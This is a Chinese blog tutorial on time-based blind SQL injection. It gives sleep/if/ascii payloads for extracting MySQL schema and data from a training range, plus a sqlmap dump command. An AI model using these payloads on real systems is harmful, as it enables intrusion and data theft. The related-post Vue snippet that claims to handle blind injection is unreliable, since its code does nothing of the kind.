学习延时盲注看这一篇就够了

已于 2023-04-17 18:39:47 修改
阅读量253 收藏 1
点赞数
文章标签: web安全 数据库
于 2023-04-17 14:02:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61553520/article/details/130196811
版权
时间盲注是一种在布尔盲注无效时使用的SQL注入技术,通过观察页面响应时间来获取信息。文章介绍了如何利用sleep函数进行延时判断,以及一系列用于检测数据库信息、表名和字段的SQL语句。虽然实际测试中应避免使用,因为可能影响业务,但可以借助工具如SQLMap进行自动化测试。
摘要由CSDN通过智能技术生成

前言

延时注入又称时间盲注,也是盲注的一种。通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据

应用场景:当布尔盲注失效的情况下,这个时候可以通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入。

在实际测试中禁止使用延时盲注,因为会影响厂商的实际业务运行,当年某人注入了一个sleep(10)后,就被请去喝茶了,建议不要轻易使用延时盲注。

延时盲注常用函数

substr(database(),1,1)数据库名称中截取 从第一位开始截取 截取长度为1
ascii() 返回字符串最左边字符的ASCII值
if(语句1,语句2,语句3) 如果语句1正确执行语句2,否则执行语句3

延时盲注实战

墨者靶场:SQL注入漏洞测试(时间盲注)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

测试注入点

常规思路

1.测速单引号,网页没有报错信息,放弃联合查询的方式

2.测试布尔盲注,网页没有false,true的变化

3.测试延时盲注

延时注入的测试效果检查可以在浏览器右击检查可以看到数据包的返回时长来验证是否发生了延时

1.判断是否存在延时注入 及 注入类型判断
?id=1' and sleep(5) --+ 根据休眠时间判断
如果延时五秒,说明注入类型是字符型

2.判断数据库的长度
and if (length(database))>数值,sleep(5),1) #是否大于10

3.判断第一个字符是什么
and if(ascii(substr(database(),1,1))>数值,sleep(5),1) #是否是字母
确定他的ascii值是多少,对应一个字符

4.确定表的数量
and if((select count(table_name) from information_schema.tables where table_schema = database())=数值,sleep(5),1)

5.确定第一个表名的长度
and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=数值,sleep(5),1)

6.判断第一个表名的第一个字符
and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>数值,sleep(5),1)

7.判断当前表有多少个字段
and if(length((select count(column_name) from information_schema.columns where table_schema=database() and table_name = ‘表名’ limit 0,1))=数值,sleep(5),1) --+

8.判断第一个字段的长度
and if(length((select column_name from information_schema.columns where table_schema =database() and table_name=‘表名’ limit 0,1) ,1,1)) =数值,sleep(5),1)

9.判断第一个字段的第一个字符
if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=‘表名’ limit 0,1),1,1))=数值,sleep(5),1)

10.根据以上信息查询数据
判断数据长度
and if(length((select 字段名 from 表名 limit 0,1))=数值,sleep(5),1)–+
判断数据的字符
and if(ascii(substr((select 字段名 from 表名 limit 0,1),1))=数值,sleep(5),1

这个过程测试起来是很麻烦的,建议使用SQLMap进行测试

python sqlmap.py -u "http://124.70.71.251:45379/flag.php?type=1" --batch -D pentesterlab -T flag -C flag,id --dump

总结

时间盲注适合在布尔注入都失效的情况,结合sleep,if(,,)基于数据包返回时间测试的方法。

Dao-道法自然
关注
【网络安全 | 2万字总结】SQL盲注?这一篇就够了。
等风来
06-16 1万+
SQL注入(Blind)是一种常见的安全漏洞,它允许攻击者向应用程序的数据库中执行恶意的SQL查询。在传统的SQL注入攻击中,攻击者可以直接获取到应用程序返回的数据库错误信息或查询结果,从而了解到他们所注入的恶意SQL语句是否生效。但在盲注(Blind)注入中,攻击者无法直接获取到这些信息,因此称之为"盲注"。在盲注攻击中,攻击者通过构造恶意的注入语句,将其输入传递给应用程序处理。然后,攻击者观察应用程序的响应或其他可见的行为来确定注入是否成功,并进一步探测和利用数据库中的数据。在本文中,我们深入探讨了。
10、注入篇--盲注【时间盲注延时注入】
WX公众号-小白学安全
04-05 1647
文章目录原理利用防范靶场 原理 利用 防范 靶场
SQL注入--盲注(布尔与延时)
weixin_44940180的博客
08-07 1277
布尔与延时盲注的区别 首先,使用二者的前提是,在参数错误的情况下(例如:1’)不会返回报错信息 布尔盲注:在正确与错误参数下,页面返回的信息有所不同 延时盲注:不论输入正确或错误参数,页面没有明显区别 时间盲注更像是布尔盲注的升级,布尔盲注的时候比较直观的变化 所以这个时候基于时间的盲注,也就是在基于布尔的盲注上结合if判断和sleep()或benchmark()函数来得到一个时间上的变换延迟的参照,也就可以让我们进行一些判断 盲注常使用的函数 length():确定字符长度 ascii():确定某个字
延时盲注(一)
qq_45300786的博客
07-13 1196
延时注入的原理 适用于,无法回现和无法显示错误页面的场景 利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息 我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化 " and 1=2 %23 然后使用延时注入, " and sleep(5) %23 1,判断当前库名的长度 这里我们用到了数据库里的if语句 有点类似于三元运算,条件成立,就执行第二个,条件不成立就执行第三个。 " and if(length(database())=12,
时间延迟盲注详解
weixin_30729609的博客
09-29 919
0x00 延迟注入定义 延迟注入,是一种盲注的手法,提交对执行时间铭感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注.SQLMAP、穿山甲、胡萝卜等主流注入工具可能检测不出,只能手工检测,利用脚本程序跑出结果。 0x01 延迟注入的函数 sleep() ...
延迟盲注
Papiofelix's Area
09-03 273
Blind SQL Injection SQL盲注的利用方法及总结:http://www.myhack58.com/Article/html/3/7/2011/32223_2.htm 简单介绍Mysql和Mssql的延迟盲注 Mysql benchmark 的使用:http://blog.csdn.net/veverrr/article/details/6312461 在延迟盲注
延时盲注(CVE-2022-0948)
热门推荐
Battery的博客
10-14 11万+
WordPress plugin Order Listener for WooCommerce 3.2.2 之前版本存在SQL注入漏洞。
网站渗透测试,看这篇就够
bluemoon_0的博客
03-16 1052
网站渗透测试,看这篇就够
pikachu——时间盲注
Lollipop_zhi的博客
03-02 5027
如果是布尔盲注,页面上会有0和1的变化,但是时间盲注页面无变化,所以我们需要监控时间,通过后台执行时间来判断 首先输入’测试一下,时间0毫秒 输入kobe’ and 1=1#,时间还是0毫秒 借助sleep()函数,输入kobe’ and sleep(3)#,时间发生了变化 输入kobe’ and if ((substr(database(),1,1))=‘p’,sleep=(5),null)#,产生了延迟 substr(database(),1,1):截取数据库名称的第一个字符。 判断是否.
sqlserver数据库布尔盲注_SQL注入实战之盲注篇(布尔、时间盲注
weixin_32179749的博客
01-14 1015
首先还是写一下核心的语句吧。information_schemaschemata(schema_name)tables(table_schema,table_name)columns(table_schema,table_name,column_name)select schema_name from information_schema.schemata;select table_name fr...
时间盲注(延迟注入)
qq_51954912的博客
04-25 1万+
时间盲注简介 时间盲注,个人理解,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。 官方理解:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。(除了看不懂,哪都好)。 利用sql-labs第九关进行实操演示
SQL注入利用学习 - 延时盲注
qq_61861243的博客
04-09 608
无法利用页面显示结果判断SQL注入是否执行成功,此时可以利用 SQL语句执行的延时 判断SQL是 否执行成功。sql时间类型的盲注本质是利用插入的SQL语句执行造成时间延迟,插入的SQL语句中包含延时执行的语 句,当数据库执行该语句时,会延时执行。
十几分钟让你学会MySQL布尔和延迟盲注手工操作
xiaoi123的博客
12-28 470
作者:Max老白Gān丶 链接:http://www.lofter.com/lpost/1fefbc76_12d25dc31 来源:LOFTER 注入常用到的几个函数     1 mid(str,1,3) 字符串获取 这里我们要看到123456789 从第一个字节也就是1开始获取到3就截止了   1 ...
【SQL注入05】延时盲注实例操作
Fighting_hawk的博客
02-19 3573
1. 理解延时盲注与布尔盲注的区别和联系; 2. 掌握延时盲注的方法。
CTF-Web30(延时盲注-难度大)
→_→
10-04 785
30.看起来有点难 分析: 一种方法直接使用工具Sqlmap直接跑出,username和password,然后登陆得到flag. 这里我们讲解另一种方法:延时盲注 测试?admin=1&pass=1&action=login报错,无法连接到数据库 测试?admin=admin'&pass=admin&action=login,报错,密码错误 这或许说明,admin=admin只要知道密码就行了。 这里本想直接用爆破,但是听说密码不是那种弱口令,或者...
sql注入之延时注入
weixin_45653478的博客
04-09 2172
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
SQL注入-时间盲注
acepanhuan的博客
02-11 2918
SQL注入盲注学习
sql注入时间盲注
最新发布
m0_52484587的博客
07-11 926
基于时间的盲注也叫延时注入。通过观察页面,既没有回显数据库内容,又没有报错信息也没有布尔类型状态,那么我们可以考虑用“绝招”--延时注入。延时注入就是根据页面的响应时间来判断是否存在注入,一点一点注入出数据库的信息。我们以第9关为例,在id=1后面加单引号或者双引号,页面不会发生任何改变,所以我们考虑绝招延时注入。1. 延时注入?如图所示,观察请求的时间线,大概在5秒以上,说明构造的sleep(5) 语句起作用,可以把这个时间线作为sql 注入的判断依据。
vue输入框怎么处理延时盲注,给个例子
05-21
延时盲注是指攻击者在注入恶意代码后,通过延时等待来判断是否注入成功。在Vue中,可以通过设置debounce属性来处理延时盲注。 下面是一个例子: ```html <template> <div> <input type="text" v-model="keyword" @input="handleInput" /> <ul> <li v-for="item in list" :key="item">{{ item }}</li> </ul> </div> </template> <script> export default { data() { return { keyword: '', list: [], }; }, methods: { async handleInput() { await this.$nextTick(); // 等待DOM更新 if (this.keyword.trim() !== '') { // 发送请求 const res = await this.$http.get('/api/search', { params: { keyword: this.keyword, }, }); this.list = res.data; } }, }, }; </script> ``` 在上面的例子中,我们使用了Vue的`$nextTick`方法来等待DOM更新,以避免用户输入过快而导致的频繁请求。同时,我们也使用了async/await来处理异步请求,保证了程序的稳定性和可读性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值